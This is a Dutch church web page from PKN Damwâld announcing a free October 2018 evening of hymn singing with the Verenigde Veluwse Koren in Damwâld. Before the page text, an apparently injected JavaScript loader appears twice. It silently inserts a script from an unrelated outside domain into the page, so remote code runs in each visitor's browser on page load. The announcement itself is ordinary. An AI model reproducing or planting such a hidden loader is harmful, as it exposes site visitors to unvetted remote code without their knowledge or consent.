;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); 27 oktober Zingend naar de Zondag met de Verenigde Veluwse Koren. - PKN Damwâld

27 oktober Zingend naar de Zondag met de Verenigde Veluwse Koren.

Gepubliceerd op: maandag 15 oktober 2018

Op zaterdagavond 27 oktober organiseren wij de 3e Zingend naar de Zondag  in de Gereformeerde Kerk aan de Foarwei 48 in Damwald.
Na twee geweldige avonden met een Mannenkoor hebben we deze keer gekozen voor een Gemengd Koor  “de Verenigde Veluwse Koren” onder leiding van Leander van der Steen.
En wie kent ze niet, de Verenigde Veluwse Koren, opgericht in 1965.
Ruim 125 mannen en vrouwen in prachtige traditionele Veluwse klederdracht treden voor u op en brengen met veel passie het eenvoudige geestelijke lied. Hierbij wordt gezocht naar bewerkingen die de tekst extra onderstrepen en muzikaal gezien veel kwaliteit hebben.
Ze genieten al vele jaren landelijke bekendheid door vele concerten, radio- en tv uitzendingen en het maken van talrijke Lp’s en Cd’s. Daarnaast maken ze ook veel  concertreizen naar het buitenland.
De Verenigde Veluwse koren zijn een samenvoeging van 4 regionale koren van de Veluwe, namelijk
De Chr. Gem. Zangver. “Crescendo” uit Hulshorst, de Chr. Gem. Zangver. “Euödia” uit Hierden, het Hervormd Kerkkoor uit Ermelo en de Gem. Zangver. ‘’De Lofstem” uit Putten.
Vaste organist bij de optredens van de Verenigde Veluwse Koren is Bert Elbertsen. Zowel dirigent als organist zijn bekenden in de muziekwereld en hebben hun sporen verdiend in binnen- en buitenland.
Naast optredens van de VVK ( zoals de koren kortweg worden genoemd )  is er natuurlijk weer veel samenzang van bekende liederen o.a. uit Johannes de Heer.
De presentatie is in handen van niemand minder dan Ds. Gaele Postma uit Wouterswoude,  Emeritus predikant van de Hervormde Gemeentes  van Dantumawoude en  Gerkesklooster-Stroobos.
De aanvang is om 19.30 uur en de toegang van deze bijzondere avond is gratis.

Wel is er een collecte voor de kosten.

Wij hopen u weer te ontmoeten, in opnieuw een volle kerk.